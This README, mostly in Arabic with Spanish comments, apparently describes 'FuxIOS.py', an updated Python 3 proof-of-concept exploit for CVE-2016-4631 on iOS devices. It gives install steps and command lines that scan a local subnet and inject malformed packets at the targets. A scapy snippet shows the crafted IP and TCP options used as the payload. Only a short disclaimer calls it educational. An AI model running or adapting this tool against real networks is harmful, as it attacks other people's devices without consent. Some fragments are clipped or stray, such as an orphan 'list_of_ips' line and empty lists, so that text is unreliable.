
نسخة محدّثة بلغة Python 3 من برهان المفهوم (PoC) لاستغلال الثغرة CVE-2016-4631، والتي تستهدف أجهزة iOS. تتميز بمسح الشبكة، وتوليد حمولات IP/TCP مشوّهة، وحقن الحزم، وذلك لأغراض الاختبارات الأمنية المصرّح بها والأغراض التعليمية.
لماذا أنشر هذا الآن؟
أثناء مراجعتي لأقراص صلبة قديمة ومستودعات منسية، عثرت على هذا السكربت الذي كتبته منذ سنوات عندما كنت في بداية مسيرتي في مجال الأمن السيبراني. كانت تلك حقبة مختلفة - حيث كان Python 2.7 هو المسيطر، وكانت الثغرات مثل CVE-2016-4631 أمرًا يوميًا، وكان كل PoC ناجح يُشعرك بأنه انتصار صغير.
عندما رأيت هذا الكود بعد كل هذا الوقت، لم أستطع منع الحنين. تذكرت تلك الليالي التي قضيتها في تصحيح exploits، والإثارة عند رؤية "Payload sent successfully"، وكيف كان كل سكربت خطوة إضافية في رحلتي التعليمية. وعلى الرغم من أنني أعمل اليوم بتقنيات أكثر تقدمًا بكثير، فإن هذا السكربت الصغير يمثل تلك الخطوات الأولى في عالم الأمن الهجومي.
قررت تحديثه ورفعه ليس فقط من باب الحنين، ولكن لأنني أعتقد أنه قد يكون مفيدًا للآخرين الذين يبدأون طريقهم في الأمن السيبراني. إنه تذكير بأننا جميعًا بدأنا من مكان ما، وأن تلك السكربتات "البسيطة" الأولى هي الأساس لكل ما يأتي بعدها.
F0LloW_Th3_R4ts كانت توقيعي آنذاك... بعض الأكواد لا تُنسى أبدًا. 🐀
- BONKERS، يوليو 2025
FuxIOS.py هو Proof of Concept (PoC) محدّث للثغرة CVE-2016-4631 التي تؤثر على أجهزة iOS. تمت إعادة كتابة هذا الإصدار بالكامل وتحديثه ليعمل مع Python 3 مع تحسينات كبيرة في الوظائف والأمان وسهولة الاستخدام.
list_of_ips ← list_ips# Instalar nmap (requerido por python-nmap)
# Windows: Descargar desde https://nmap.org/download.html
# Linux: sudo apt-get install nmap
# macOS: brew install nmap
# Clonar repositorio
git clone <repo-url>
cd FuxiOS
# Instalar dependencias
pip install -r requirements.txt
# O manualmente:
pip install scapy python-nmap
# Uso básico
sudo python3 FuxIOS.py
# Configuración personalizada
sudo python3 FuxIOS.py -s 192.168.1.100 -n 192.168.1.0/24
# Opciones avanzadas
sudo python3 FuxIOS.py -s 192.168.1.100 -n 192.168.1.0/24 -m 50 -d 0.1
# Ver ayuda
python3 FuxIOS.py -h
sudo python3 FuxIOS.py --interactive
-s, --source: عنوان IP مصدر الهجوم (الافتراضي: 192.168.1.95)-n, --network: الشبكة الفرعية الهدف (الافتراضي: 192.168.1.0/24)-m, --max-payload: الحجم الأقصى للحمولة (الافتراضي: 40)-d, --delay: التأخير بين الحزم بالثواني (الافتراضي: 0.2)--interactive: الوضع التفاعلي للتوافق# Paquete malicioso
IP(src=source_ip, dst=target_ip, options=malformed_payload) /
TCP(dport=80, flags="S", options=[(19, b"x"*18), (19, b"x"*18)])
يجب استخدام هذه الأداة حصريًا من أجل:
يتم حفظ السجلات في fuxios_exploit.log وتتضمن:
خطأ: "No module named 'scapy'"
pip install scapy
خطأ: "No module named 'nmap'"
pip install python-nmap
# Y asegúrate de tener nmap instalado en el sistema
خطأ: "Permission denied"
# Linux/macOS
sudo python3 FuxIOS.py
# Windows
# Ejecutar PowerShell/CMD como administrador
Windows: "WinPcap/Npcap not found"
هذا المشروع مخصص للأغراض التعليمية فقط. لا يتحمل المؤلف أي مسؤولية عن إساءة استخدام هذه الأداة.
تذكير: "F0LloW_Th3_R4ts <:8)~~ <:8)~~"